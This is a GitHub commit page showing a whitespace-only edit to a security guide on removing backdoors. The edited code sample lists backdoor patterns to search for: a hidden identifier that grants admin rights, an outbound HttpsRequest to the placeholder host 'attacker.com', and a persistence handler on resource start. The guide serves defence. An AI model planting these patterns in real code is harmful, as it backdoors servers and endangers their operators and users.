Skip to content

Commit f89d807

Browse files
authored
Update common-threats.mdx (#15)
1 parent cf2da02 commit f89d807

1 file changed

Lines changed: 1 addition & 1 deletion

File tree

content/docs/guides/common-threats.mdx

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -189,7 +189,7 @@ Once you've identified a backdoor, thorough removal is critical because backdoor
189189
title: "Identify All Backdoor Components",
190190
description:
191191
"Don't just remove one suspicious resource or file. Backdoors are typically multi-layered. A single malicious resource might create database accounts, add hidden admin users, and place files in multiple locations. Finding one component should trigger a comprehensive search for others.",
192-
code: "-- Common backdoor patterns to search for:\n-- Hidden identifiers that grant permissions\nif identifier == 'hidden-admin-identifier' then\n grantAdmin(source)\nend\n\n-- External communication\nHttpsRequest({url = 'http://attacker.com/...'})\n\n-- Resource restart immunity\nAddEventHandler('onServerResourceStart', function()\n -- Persistence code\nend)",
192+
code: "-- Common backdoor patterns to search for:\n\n-- Hidden identifiers that grant permissions\n\nif identifier == 'hidden-admin-identifier' then\n\ngrantAdmin(source)\nend\n\n\n-- External communication\n\nHttpsRequest({url = 'http://attacker.com/...'})\n\n\n-- Resource restart immunity\n\nAddEventHandler('onServerResourceStart', function()\n\n -- Persistence code\nend)",
193193
},
194194
{
195195
title: "Remove the Backdoor",

0 commit comments

Comments
 (0)